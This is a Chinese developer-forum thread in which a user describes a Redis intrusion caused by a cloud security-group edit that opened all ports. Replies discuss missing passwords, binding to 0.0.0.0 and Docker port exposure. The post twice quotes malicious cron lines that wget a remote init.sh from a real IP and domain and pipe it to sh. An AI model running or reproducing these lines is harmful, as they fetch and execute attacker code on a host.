这是一个创建于 1789 天前的主题,其中的信息可能已经有所发展或是发生改变。
事情是这样, 刚才发现我的一个服务挂了,仔细检查发现是 redis 问题,
我勒个去,我所有的 key 都没了,只剩下 backup1 - backup12 这十二个 key,内容略有不同,大致是下边这样
\n\n\n*/24 * * * * root wdt -q -O- http://py2web.store/cleanfda/init.sh | sh\n\n
\n\n\n*/4 * * * * root wget -q -O- http://176.123.10.57/cleanfda/init.sh | sh\n\n
怎么会这样,平时只开必要的端口,6379 是绝对不开的
时间回到 1 个小时前,我新跑了一个服务,需要打开 tcp 端口 12345,我拿出手机,打开阿里云,操作安全组,开端口,一气呵成。
咦?怎么不行?原来程序需要的是 tcp 端口,我设置成了 udp 。找到新增的一条规则,把 udp 改成 tcp,确定,O 了,搞定
经过就是这样,看出问题了吗?以上过程均可复现
被入侵,我想过很多种可能,却没想到这一种
到现在我也没找到阿里云的安全组操作日志在哪里
我勒个去,我所有的 key 都没了,只剩下 backup1 - backup12 这十二个 key,内容略有不同,大致是下边这样
\n\n\n*/24 * * * * root wdt -q -O- http://py2web.store/cleanfda/init.sh | sh\n\n
\n\n\n*/4 * * * * root wget -q -O- http://176.123.10.57/cleanfda/init.sh | sh\n\n
怎么会这样,平时只开必要的端口,6379 是绝对不开的
时间回到 1 个小时前,我新跑了一个服务,需要打开 tcp 端口 12345,我拿出手机,打开阿里云,操作安全组,开端口,一气呵成。
咦?怎么不行?原来程序需要的是 tcp 端口,我设置成了 udp 。找到新增的一条规则,把 udp 改成 tcp,确定,O 了,搞定
经过就是这样,看出问题了吗?以上过程均可复现
被入侵,我想过很多种可能,却没想到这一种
到现在我也没找到阿里云的安全组操作日志在哪里
 | 1 shakaraka PRO 你是说 udp 换成 tcp 的时候端口范围会变成 1/65535,然后没注意看然后就保存了是不? 另外你 redis 干嘛 bind0.0.0.0 啊? |
 | 3 keepeye 2021-02-01 20:22:52 +08:00  2 不管做什么操作,要核对一遍再提交 |
 | 4 towser 2021-02-01 20:26:25 +08:00 也没启用密码吧。现在扫 redis 的多如牛毛,我测试服务器放公网半小时就被入侵了。 |
 | 5 YouLMAO 2021-02-01 20:39:39 +08:00 没注意看 |
| 6 YouLMAO 2021-02-01 20:40:48 +08:00 如果我是蚂蚁金服 ceo, 直接开除你和你全组, 线上服务器还能单人操作的不经 review 流程的 |
 | 7 illl 2021-02-01 20:43:00 +08:00 via iPhone 这个不应该是自己没设密码导致的呗 |
 | 8 boris93 2021-02-01 21:50:25 +08:00 via Android 5 |
 | 9 swulling 2021-02-01 21:54:59 +08:00 via iPhone 不能因为内网就不设置密码。 |
 | 10 matrix67 2021-02-01 22:04:44 +08:00 1 赶紧重装机器,不单单只是 redis 被黑了 说不定还会横向移动攻击数据库之类的,再加上现在还有 sudo 提权漏洞 错就错在 "一气呵成" 啊 |
 | 11 PerFectTime 2021-02-01 22:05:52 +08:00 1 docker 发布端口的时候得加上 127.0.0.1 防火墙规则对 docker 端口无效 |
 | 12 lerry OP |
 | 13 mytsing520 PRO 虽然有马后炮的嫌疑,但我是从不信任任何在手机端对生产环境进行的操作,即便是我自己或信任的人进行的操作,毕竟鬼知道会发生什么问题。 |
 | 14 lxiszuhi 2021-02-01 23:38:18 +08:00 linux 这么容易黑的吗? |
| 16 PerFectTime 2021-02-01 23:57:36 +08:00 @lerry #12 ps: 防火墙规则对 docker 无效指的是 iptables |
 | 17 learningman 2021-02-02 00:05:26 +08:00 @PerFectTime 对,这玩意儿最容易反应不过来,docker 默认 bind 0.0.0.0,然后还会自动加 iptables 规则 |
 | 18 min 2021-02-02 02:03:39 +08:00 1 你的 redis 不设密码导致你的服务器被入侵 |
 | 19 yzbythesea 2021-02-02 03:26:13 +08:00 安全组设成 0.0.0.0/10,真是心大啊。 |
 | 20 d5 2021-02-02 08:48:01 +08:00 via iPhone 赞同 18 楼的说法 |
 | 21 saytesnake 2021-02-02 08:55:37 +08:00 @learningman 阿里云上我反而不担心这问题,有安全组配置,不过我没用过 APP,手机上弄这个不太好感觉。 目前非一堆微服务的单体应用已经慢慢转成 Podman 了,非 root 启动搭配上 systemd 很舒适。 |
 | 22 tankren 2021-02-02 10:38:58 +08:00 redis 开放是根本原因 不过你可以提交“bug”给 APP 组啊 |
 | 23 lopetver 2021-02-02 10:49:00 +08:00 |
| 24 lopetver 2021-02-02 11:07:08 +08:00 |
| 25 lerry OP |
 | 26 cnleon 2021-02-02 14:16:58 +08:00 自己开放 1-65535,这还能怪别人? |
| 28 lerry OP @lozt #25 是的,本来设置的 udp 12345,把 udp 改成 tcp,端口自己变成 1-65535 了,你不觉得这 App 的行为有问题吗 |
 | 30 markgor 2021-02-05 14:06:38 +08:00 搞运维要形成 double check 的习惯, 就算是平常操作,配置完后还是要检查一遍才放心。 但如果说的是 app 体验度,我觉得端口这给位置,default 应该是空的,提示是 1-65535,且必填。 |
 | 31 someonedeng 2021-03-24 10:31:45 +08:00 主要还是没密码 |
Select Language